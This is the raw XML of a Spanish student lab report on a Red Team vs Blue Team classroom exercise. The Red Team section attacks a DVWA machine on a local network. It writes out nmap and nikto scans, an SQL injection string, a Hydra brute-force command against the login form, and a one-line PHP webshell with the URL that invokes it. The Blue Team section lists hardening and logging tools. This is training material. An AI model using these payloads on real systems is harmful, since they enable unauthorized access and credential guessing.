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B0E" w:rsidRDefault="006D51D9" w:rsidP="006D51D9">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
      <w:r>
        <w:t>PROYECTO RED TEAM Y BLUE TEAM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proyecto FP (sin laboratorio): Red Team vs Blue Team con VMs locales</w:t>
      </w:r>
    </w:p>
    <w:p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>podemos usar metasploits o cualquier otra herramienta</w:t>
      </w:r>
    </w:p>
    <w:p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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:r w:rsidRPr="00162437">
        <w:t>Cada alumno (o cada pareja) tendrá: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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ubuntu  (Victim: servicios vulnerables)</w:t>
      </w:r>
    </w:p>
    <w:p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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>Apache + DVWA o JuiceShop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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00476B4B" w:rsidP="00162437">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:r w:rsidRPr="00162437">
        <w:t>Tareas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>Reconocimiento (Nmap)</w:t>
      </w:r>
    </w:p>
    <w:p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:rsidR="00395F25" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>Explotación web (DVWA/JuiceShop)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRPr="00F66A80" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICA REALIZADA COMO RED TEAM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Configuración del adaptador de la maquina virtual kali a adaptador puente para tenr visibilidad con los demas equipos en red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="36487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DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB"/>
    <w:p w:rsidR="00C628DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:r>
        <w:t>Utilizamos una maquina con el sistema operativo Kali Linux como atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3040380"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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96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25" w:rsidRDefault="00395F25"/>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00216DB2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🟥</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RED TEAM – PLAN DE ATAQUE COMPLETO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t xml:space="preserve">Tu objetivo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conseguir acceso controlado a la máquina víctima</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demostrarlo con capturas y evidencias</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dejar rastro para que el Blue Team pueda detectarte</w:t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FASE 1 – Reconocimiento (Nmap)</w:t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D</w:t>
      </w:r>
      <w:r w:rsidR="00D36B53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>escubrir si la víctima está activa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D36B53" w:rsidRDefault="00D36B53" w:rsidP="00395F25">
      <w:r>
        <w:t>Ping para comprobar la respuesta de la maquina</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216DB2" w:rsidRDefault="00216DB2" w:rsidP="00395F25">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5341287" cy="1905000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25986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0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66" cy="190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DB2" w:rsidRDefault="00216DB2" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>nmap -sn 192.168.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216DB2" w:rsidRPr="00254378" w:rsidRDefault="00216DB2" w:rsidP="00395F25">
      <w:r>
        <w:t xml:space="preserve">Al ser una práctica en clase no realizamos el escaneo con </w:t>
      </w:r>
      <w:r w:rsidRPr="00216DB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a toda la red, y solo centramos los ataques a la IP que nos proporcionaron los compañeros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216DB2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Escaneo de puertos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070A55" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>nmap -sV -O 192.168.0.91</w:t>
      </w:r>
      <w:r w:rsidR="00070A55" w:rsidRPr="00070A55">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2343150"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="210752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55" w:rsidRDefault="00070A55" w:rsidP="00395F25"/>
    <w:p w:rsidR="00070A55" w:rsidRDefault="00070A55" w:rsidP="00395F25"/>
    <w:p w:rsidR="00070A55" w:rsidRDefault="00070A55" w:rsidP="00395F25"/>
    <w:p w:rsidR="00216DB2" w:rsidRDefault="00216DB2" w:rsidP="00395F25">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Usamos metasploit para realizar el escaneo de puertos y ver posibles vulnerabilidades en los servicios y puertos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216DB2" w:rsidRDefault="00216DB2" w:rsidP="00395F25">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3332837" cy="2257425"/>
            <wp:effectExtent l="19050" t="0" r="913" b="0"/>
            <wp:docPr id="137590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5788" cy="225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58" w:rsidRPr="00254378" w:rsidRDefault="004D6458" w:rsidP="00395F25">
      <w:r w:rsidRPr="004D6458">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4657701" cy="2657475"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29729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430" cy="26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25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>IP detectada</w:t>
      </w:r>
      <w:r w:rsidR="00D36B53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Versiones de servicios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6458" w:rsidRDefault="004D6458" w:rsidP="004D6458">
      <w:r w:rsidRPr="004D6458">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3287395"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="192605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7605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58" w:rsidRPr="00254378" w:rsidRDefault="004D6458" w:rsidP="004D6458">
      <w:r>
        <w:t>Vemos que el puerto 80 esta abierto,(por defecto para servidor web), y lo siguiente que hicimos fue abrir un navegador para comprobar que servicio estaba corriendo, y efectivamente había un servidor web (Apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070A55" w:rsidRDefault="00070A55" w:rsidP="00395F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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FASE 2 – Enumeración de servicios</w:t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HTTP (Apache + DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t xml:space="preserve">nikto -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00C628DB" w:rsidRPr="007B7E91">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.0.91</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRDefault="00C628DB" w:rsidP="00C628DB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Escaneo con Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C628DB" w:rsidRPr="00254378" w:rsidRDefault="00C628DB" w:rsidP="00395F25">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102250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3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Ver cabeceras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t xml:space="preserve">curl -I </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00D36B53" w:rsidRPr="007B7E91">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.0.91</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D36B53" w:rsidRPr="00254378" w:rsidRDefault="00070A55" w:rsidP="00395F25">
      <w:r w:rsidRPr="00070A55">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3042138" cy="1647825"/>
            <wp:effectExtent l="19050" t="0" r="5862" b="0"/>
            <wp:docPr id="1238274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138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Navegar DVWA y ver vulnerabilidades disponibles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Página principal de DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Vulnerabilidades detectadas por Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Cabeceras inseguras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070A5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FASE 3 – Explotación Web (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>DVWA tiene vulnerabilidades para practicar:</w:t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SQL Injection (Low)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Entra en DVWA → SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Prueba:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070A55" w:rsidRDefault="00070A55" w:rsidP="00395F25">
      <w:r w:rsidRPr="00070A55">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4448046" cy="3486150"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="158428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385" cy="348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649" w:rsidRPr="00254378" w:rsidRDefault="00CE3649" w:rsidP="00395F25">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1981200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="2 Imagen" descr="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Brute Force (con Hydra si te lo permiten)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.91 http-post-form "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=Login:Loginfailed"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Upload (Low)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Sube un webshell PHP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>&lt;?phpsystem($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00254378">
        <w:t>Accede:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00395F25" w:rsidRPr="00254378" w:rsidRDefault="00395F25" w:rsidP="00395F25">
      <w:r w:rsidRPr="00254378">
        <w:t>http://192.168.0.91/dvwa/hackable/uploads/shell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00395F25"/>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00476B4B" w:rsidP="00162437">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00216DB2" w:rsidP="00162437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00216DB2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
        </w:rPr>
        <w:t>🟥</w:t>
      </w:r>
      <w:r w:rsidRPr="00254378">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00162437" w:rsidRPr="00162437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blue Team (Defensa)</w:t>
      </w:r>
    </w:p>
    <w:p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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:r w:rsidRPr="00162437">
        <w:t>Tareas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>Hardening (SSH, Apache)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>Firewall (UFW/iptables)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E97FC7" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00B45D37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>Detección (logs + monitorización)</w:t>
      </w:r>
    </w:p>
    <w:p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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00476B4B" w:rsidP="00162437">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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lastRenderedPageBreak/>
        <w:t>Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>nikto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>hydra (solo si tú lo autorizas y con límites)</w:t>
      </w:r>
    </w:p>
    <w:p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:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>ufw / iptables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>journalctl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRPr="00162437" w:rsidRDefault="00162437" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00162437">
        <w:t>logs Apache (/var/log/apache2/access.log / error.log)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162437" w:rsidRDefault="00CE3649" w:rsidP="00162437">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r w:rsidR="00162437" w:rsidRPr="00162437">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54"/>
    <w:p w:rsidR="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54"/>
    <w:p w:rsidR="00B45D37" w:rsidRDefault="00B45D37" w:rsidP="004E1F54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45D37" w:rsidRDefault="00B45D37" w:rsidP="004E1F54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45D37" w:rsidRDefault="00B45D37" w:rsidP="00B45D37">
      <w:pPr>
        <w:ind w:left="2832"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEFENSA DEL BLUE TEAM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45D37" w:rsidRDefault="00B45D37" w:rsidP="00B45D37">
      <w:pPr>
        <w:ind w:left="2832"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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1. Fase de Configuración y Hardening (Prevención)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1F54" w:rsidRPr="004E1F54" w:rsidRDefault="004E1F54" w:rsidP="004E1F54">
      <w:r w:rsidRPr="004E1F54">
